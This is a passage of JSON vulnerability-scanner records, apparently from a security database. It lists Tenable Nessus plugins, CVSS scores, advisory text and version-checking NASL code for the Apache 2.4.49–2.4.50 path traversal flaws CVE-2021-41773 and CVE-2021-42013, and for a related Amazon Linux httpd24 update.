"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "nessus", "title": "Apache 2.4.49 < 2.4.51 Path Traversal", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113015", "href": "https://www.tenable.com/plugins/was/113015", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:57:22", "description": "The Apache http server project reports :\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013).\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nIf files outside of these directories are not protected by the usual default configuration 'require all denied', these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\nAcknowledgements: Reported by Juan Escobar from Dreamlab Technologies, Fernando Munoz from NULL Life CTF Team, and Shungo Kumasaka", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-11T00:00:00", "type": "nessus", "title": "FreeBSD : Apache httpd -- Path Traversal and Remote Code Execution (d001c189-2793-11ec-8fb1-206a8a720317)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-08-31T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache24", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_D001C189279311EC8FB1206A8A720317.NASL", "href": "https://www.tenable.com/plugins/nessus/153983", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153983);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/31\");\n\n script_cve_id(\"CVE-2021-42013\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"FreeBSD : Apache httpd -- Path Traversal and Remote Code Execution (d001c189-2793-11ec-8fb1-206a8a720317)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Apache http server project reports :\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP\nServer 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)\n(CVE-2021-42013).\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server\n2.4.50 was insufficient. An attacker could use a path traversal attack\nto map URLs to files outside the directories configured by Alias-like\ndirectives.\n\nIf files outside of these directories are not protected by the usual\ndefault configuration 'require all denied', these requests can\nsucceed. If CGI scripts are also enabled for these aliased pathes,\nthis could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not\nearlier versions.\n\nAcknowledgements: Reported by Juan Escobar from Dreamlab Technologies,\nFernando Munoz from NULL Life CTF Team, and Shungo Kumasaka\");\n # https://vuxml.freebsd.org/freebsd/d001c189-2793-11ec-8fb1-206a8a720317.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c28c816\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache24\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache24>=2.4.49<2.4.51\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:56:54", "description": "The version of Apache httpd installed on the remote host is 2.4.49 prior to 2.4.51. It is, therefore, affected by a vulnerability as referenced in the 2.4.51 advisory.\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "nessus", "title": "Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-08-31T00:00:00", "cpe": ["cpe:/a:apache:http_server", "cpe:/a:apache:httpd"], "id": "APACHE_2_4_51.NASL", "href": "https://www.tenable.com/plugins/nessus/153952", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153952);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/31\");\n\n script_cve_id(\"CVE-2021-42013\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache httpd installed on the remote host is 2.4.49 prior to 2.4.51. It is, therefore, affected by a\nvulnerability as referenced in the 2.4.51 advisory.\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a\n path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.4.51 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:httpd\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\", \"apache_http_server_nix_installed.nbin\", \"apache_httpd_win_installed.nbin\");\n script_require_keys(\"installed_sw/Apache\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::apache_http_server::combined_get_app_info(app:'Apache');\n\nvar constraints = [\n { 'min_version' : '2.4.49', 'fixed_version' : '2.4.51' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:57:27", "description": "The version of httpd24 installed on the remote host is prior to 2.4.51-1.94. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS-2021-1543 advisory.\n\n - A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.\n (CVE-2021-33193)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive). (CVE-2021-36160)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013. (CVE-2021-41773)\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-17T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : httpd24 (ALAS-2021-1543)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33193", "CVE-2021-34798", "CVE-2021-36160", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd24", "p-cpe:/a:amazon:linux:httpd24-debuginfo", "p-cpe:/a:amazon:linux:httpd24-devel", "p-cpe:/a:amazon:linux:httpd24-manual", "p-cpe:/a:amazon:linux:httpd24-tools", "p-cpe:/a:amazon:linux:mod24_ldap", "p-cpe:/a:amazon:linux:mod24_md", "p-cpe:/a:amazon:linux:mod24_proxy_html", "p-cpe:/a:amazon:linux:mod24_session", "p-cpe:/a:amazon:linux:mod24_ssl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2021-1543.NASL", "href": "https://www.tenable.com/plugins/nessus/154188", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2021-1543.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154188);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-33193\",\n \"CVE-2021-34798\",\n \"CVE-2021-36160\",\n \"CVE-2021-39275\",\n \"CVE-2021-40438\",\n \"CVE-2021-41524\",\n \"CVE-2021-41773\",\n \"CVE-2021-42013\"\n );\n script_xref(name:\"ALAS\", value:\"2021-1543\");\n script_xref(name:\"IAVA\", value:\"2021-A-0440-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0451-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0046\");\n\n script_name(english:\"Amazon Linux AMI : httpd24 (ALAS-2021-1543)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of httpd24 installed on the remote host is prior to 2.4.51-1.94. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS-2021-1543 advisory.\n\n - A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead\n to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.\n (CVE-2021-33193)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP\n Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and\n crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive). (CVE-2021-36160)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules\n pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache\n HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request\n processing, allowing an external source to DoS the server. This requires a specially crafted request. The\n vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could\n use a path traversal attack to map URLs to files outside the directories configured by Alias-like\n directives. If files outside of these directories are not protected by the usual default configuration\n require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This\n issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found\n to be incomplete, see CVE-2021-42013. (CVE-2021-41773)\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker\n could use a path traversal attack to map URLs to files outside the directories configured by Alias-like\n directives. If files outside of these directories are not protected by the usual default configuration\n require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache\n 2.4.50 and not earlier versions. (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2021-1543.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-33193\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-34798\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-36160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-39275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-40438\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-41524\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-41773\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-42013\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update httpd24' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd24-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_md\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod24_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'httpd24-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-debuginfo-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-debuginfo-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-devel-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-devel-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-manual-2.4.51-1.94.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-tools-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd24-tools-2.4.51-1.94.amzn1', 'cpu':'x86_64', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod24_ldap-2.4.51-1.94.amzn1', 'cpu':'i686', 'release':'ALA', 